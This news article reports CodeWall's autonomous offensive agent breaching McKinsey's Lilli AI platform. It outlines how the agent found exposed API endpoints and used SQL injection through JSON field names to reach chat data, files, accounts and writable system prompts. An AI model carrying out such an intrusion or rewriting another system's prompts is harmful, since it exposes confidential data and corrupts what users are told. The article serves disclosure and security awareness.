Welcome to the forefront of conversational AI as we explore the fascinating world of AI chatbots in our dedicated blog series. Discover the latest advancements, applications, and strategies that propel the evolution of chatbot technology. From enhancing customer interactions to streamlining business processes, these articles delve into the innovative ways artificial intelligence is shaping the landscape of automated conversational agents. Whether you’re a business owner, developer, or simply intrigued by the future of interactive technology, join us on this journey to unravel the transformative power and endless possibilities of AI chatbots.
A security test conducted by the cybersecurity startup CodeWall demonstrates just how quickly autonomous AI systems can now identify security vulnerabilities in complex platforms. The researchers deployed a specially developed offensive agent against the internal generative AI platform Lilli, developed by the consulting firm McKinsey. Without human assistance, the system managed to gain access to central databases within about two hours, thereby uncovering a critical security vulnerability.
According to CodeWall, the attack began without any login credentials or insider information. The autonomous agent began its analysis using publicly available technical documentation and identified several API endpoints within it that were accessible via the internet. Some of these interfaces were apparently not sufficiently protected. In total, the agent found nearly two dozen such endpoints through which requests could be sent to the system.
Particularly problematic was a search endpoint, whose structure the agent examined more closely. In doing so, the system determined that field names from JSON requests were being incorporated unfiltered into database queries. This unusual implementation meant that it was not the content of the request, but the structure names themselves that were potentially vulnerable. The AI agent detected this anomaly based on error messages in which the JSON keys appeared directly.
Based on this, the agent carried out an SQL injection attack. According to CodeWall, this vulnerability would likely have been overlooked by traditional automated security scanners, as the attack vector lay not in the transmitted values but in the structure of the data fields. The autonomous agent, however, was able to identify this peculiarity and exploit it specifically.
According to the researchers, the system managed to gain full read and write access to the platform’s production database within two hours. According to CodeWall, this database contained approximately 46.5 million chat messages in plain text. The content covered topics such as strategic business decisions, mergers and acquisitions, and internal project work with clients.
In addition to the chat data, the agent also found large amounts of other sensitive information. This included approximately 728,000 files containing confidential customer data, about 57,000 user accounts, and 95 so-called system prompts. These prompts control the AI’s behavior and define how the chatbot generates responses. According to CodeWall, a particularly critical issue was that these system prompts could also be altered. An attacker could theoretically have used this to manipulate all of the chatbot’s responses.
The generative AI platform Lilli was introduced by McKinsey in the summer of 2023. It serves as a research and analysis tool for consultants within the company and, according to the company, is now used by more than 40,000 employees. Among other things, the platform supports strategic analyses, the evaluation of internal information, and the preparation of client projects.
After CodeWall reported the discovered vulnerabilities in early March, McKinsey stated that it responded quickly. The company explained that the affected interfaces had been closed within a few hours. A spokesperson also emphasized that an internal investigation was conducted in collaboration with an external forensic security firm.
According to the company, this investigation found no evidence that customer data had actually been accessed by the researchers or other unauthorized third parties. The protection of sensitive information is a top priority for McKinsey.
For CodeWall CEO Paul Price, however, the incident is a clear warning sign for companies operating their own AI systems. The offensive agent used autonomously selected the target and identified a complex security vulnerability without human guidance. Such tools could also be used by criminal groups in the future.
With the increasing prevalence of generative AI systems, the likelihood that automated attack software will specifically search for vulnerabilities is also rising. Autonomous agents can analyze large amounts of documentation, observe system behavior, and identify potential points of attack much faster than human security teams. Companies must therefore prepare for the fact that attacks will increasingly be carried out by AI-powered systems in the future.
The CodeWall test demonstrates just how capable autonomous AI agents have already become in identifying security vulnerabilities. Within a short period of time, the system was able to identify a complex vulnerability and gain extensive access to a central corporate platform. Even though McKinsey reports that it did not detect any data breaches, the incident highlights the growing risk of automated cyberattacks. Companies that use generative AI systems must therefore increasingly secure their security architecture against AI-powered attackers as well.
Beginne eine Diskussion
Kommentar
Lade neue Kommentare
Artikel-Butler
Ein Sicherheitstest des Cybersecurity-Startups CodeWall zeigt, wie schnell autonome KI-Systeme inzwischen Sicherheitslücken in komplexen Plattformen finden können. Die Forscher setzten einen speziell entwickelten Offensiv-Agenten auf die interne generative KI-Plattform Lilli der Unternehmensberatung McKinsey an. Ohne menschliche Unterstützung gelang es dem System innerhalb von rund zwei Stunden, Zugriff auf zentrale Datenbanken zu erlangen und damit eine […] (read full article…)
Antwort Gefällt mir
Alle Kommentare lesen unter igor´sLAB Community →
Wir verwenden Technologien wie Cookies, um Geräteinformationen zu speichern und/oder darauf zuzugreifen. Wir tun dies, um das Surferlebnis zu verbessern und um personalisierte Werbung anzuzeigen. Wenn Sie diesen Technologien zustimmen, können wir Daten wie das Surfverhalten oder eindeutige IDs auf dieser Website verarbeiten. Wenn Sie Ihre Zustimmung nicht erteilen oder zurückziehen, können bestimmte Funktionen beeinträchtigt werden.